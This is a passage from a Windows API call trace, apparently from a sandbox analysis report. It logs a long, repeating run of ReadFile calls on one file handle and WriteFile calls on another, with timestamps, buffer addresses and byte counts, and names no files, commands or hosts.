hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0022.008] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x36e, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.009] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0022.009] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x31d, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.010] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0022.010] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x358, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.011] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0022.011] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3fd, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.012] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0022.012] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x325, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.013] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0022.013] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2cc, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.013] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0022.014] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.014] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.017] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0022.017] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3ab, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.018] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0022.018] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.019] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0xe, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.019] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0022.019] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2dc, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.020] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0022.020] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.021] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x6f, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.021] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0022.022] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2da, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.022] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0022.023] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x23b, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.023] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0022.024] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2ad, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.024] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0022.025] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x368, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.025] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0022.026] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x25c, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.026] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0022.027] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x246, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.027] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0022.028] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x260, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.028] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0022.028] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x28a, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.029] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0022.029] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x281, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.030] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0022.030] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2eb, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.031] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0022.031] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x266, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.032] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0022.032] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x277, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.033] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0022.033] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2a4, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.034] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0022.034] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.035] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x5b, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.035] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0022.036] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2d8, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.036] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0022.037] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2f3, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.037] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0022.038] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x285, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.038] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0022.039] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x287, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.039] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0022.040] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2a7, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.040] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0022.041] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x25e, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.041] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0022.042] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x272, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.042] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0022.043] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x276, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.043] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0022.044] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x267, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.044] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0022.044] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x250, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.045] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0022.045] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2a2, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.046] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0022.046] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2ae, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.047] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0022.047] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2f7, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.048] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0022.048] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2b4, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.049] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0022.049] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x27d, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.050] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0022.050] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2d3, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.050] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0022.051] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x292, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.051] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0022.052] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x289, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.053] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0022.053] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2b0, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.053] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0022.054] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2a9, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.054] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0022.055] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x283, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.055] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0022.056] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x28c, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.056] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0022.057] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x27a, 